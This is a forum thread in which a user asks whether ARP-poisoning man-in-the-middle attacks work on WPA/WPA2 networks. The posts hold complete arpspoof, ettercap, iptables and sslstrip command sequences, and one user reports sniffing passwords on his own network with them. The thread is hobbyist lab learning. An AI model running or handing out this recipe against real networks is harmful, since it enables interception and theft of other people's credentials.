Is Arp-Poisoning MITM attack possible on WPA network?
Hi guys,
I've been piddling around with arp-poisoning using Ettercap-ng and Arpspoof along with Sslstrip and various Dsniff programs like urlsnarf, webspy, etc. I can succesfully perform a mitm on my open network and on my network with WEP encryption enabled, but I would like to be able to do the same on it with WPA encryption enabled. (Obviously I know the passkey cause its my network.)
I was previously under the impression that it was difficult or impossible to perform an Arp Poisoning on a WPA encrypted network due to the fact that merely knowing the passkey is not sufficient to decrypt the packets because of the WPA handshake. Then I stumbled upon this thread "http://www.backtrack-linux.org/forums/old-newbie-area/24774-ettercap-wpa.html" which claimed that performing a mitm attack on a WPA network is done exactly the same as on an unencrypted network (no handshake or passkey stuff required as long as you're connected to the AP).
Incidently, I have tried performing the attack just like on and unencrypted network (except I tried bothe Arpspoof and Ettercap-ng) but I end up DOSing both myself and my victim laptop.
So, my questions are:
1. Is the answer to this thread correct in saying that performing a MITM attack on a WPA is done the same as on an open network?
2. If question 1. is "yes", then what am I doing wrong? (I will post my commands if that is the case)
Thanks in advance!
Re: Is Arp-Poisoning MITM attack possible on WPA network?
Well you're connected to the network right ? So yes..
Posting commands used is always good to allow people to see what you have tried.
Re: Is Arp-Poisoning MITM attack possible on WPA network?
Ok, thanks. I appreciate the help. I'm fairly certain its not a driver issue cause as I said before aircrack-ng works fine. I am using Backtrack 4 running on a Dell Mini 9 with an Intel 5100 card.
Here are my commands. obviously they are run as root.
Using Arpspoof:
Code:
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
sslstrip -k -f -l 8080
arpspoof -i wlan0 -t 192.168.1.7 192.168.1.1
Using Ettercap-NG:
Code:
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
sslstrip -k -f -l 8080
ettercap -T -i wlan0 -Tq -M ARP // //
Also, for etter.conf I have cahnged ec_uid to 0, and ec_gid to 0. I did not uncomment the iptables line since I was using Sslstrip.
Thanks for the help! I really appreciate it.
Re: Is Arp-Poisoning MITM attack possible on WPA network?
Ok, I figured it out. Thanks TAPE for clarifying that its possible. For all those who may read this post in the future I would like to clarify:
Contrary to what some other sites (I can remember specifically but I've read it somewhere) say, it is entirely possible to perform a MITM attack using Arpspoof (and probably Ettercap to but I haven't got it to work yet) on a WPA or WPA2 encrypted network. I sucessfully used Arpspoof and Sslstrip to sniff passwords on my WPA2 network. I'm sure many many people have done this before but I had spent a long time trying to find out if it was even possible, which it is.
Just in case anyone is wondering what commands I used:
Code:
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i wlan0 -t 192.168.1.5 192.168.1.1
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
cd /home/christopher/.sslstrip-0.7 #of course you will have to change this to your location
python sslstrip.py -k -f -l 8080
Re: Is Arp-Poisoning MITM attack possible on WPA network?
Perhaps best to first try and single out a specific host with ettercap
Code:
ettercap -Tq -i wlan0 -M arp:remote /192.168.1.7/ /192.168.1.1/
Re: Is Arp-Poisoning MITM attack possible on WPA network?
Quote:
Originally Posted by
TAPE
Perhaps best to first try and single out a specific host with ettercap
Code:
ettercap -Tq -i wlan0 -M arp:remote /192.168.1.7/ /192.168.1.1/
Also, rather than using the tools, learn how this sort of thing works - it is possible to hand generate our ARP packets and send them off. Less network traffic lets you learn what's going on and also reason out why things would be hurting a bit here.
Re: Is Arp-Poisoning MITM attack possible on WPA network?
Thanks guys! Actually, I've got it working with Ettercap in the meantime using the same commands as on an unencrypted network. Sorry I'm so slow to post. Thanks for the help TAPE, I actually had set specific targets I just typed it wrong in my post, but thanks for your time.
Also, Gitsnik, thanks for the tip, I'll look into making my own Arp packets. That sounds like a useful thing to know how to do. I really appreciate you guys.
I will mark this thread as solved.
Thanks!
edit: Actually, I can't figure out how to mark this thread as solved. If this is important please let me know how, otherwise I will assume that only the Admins can do that. thanks guys
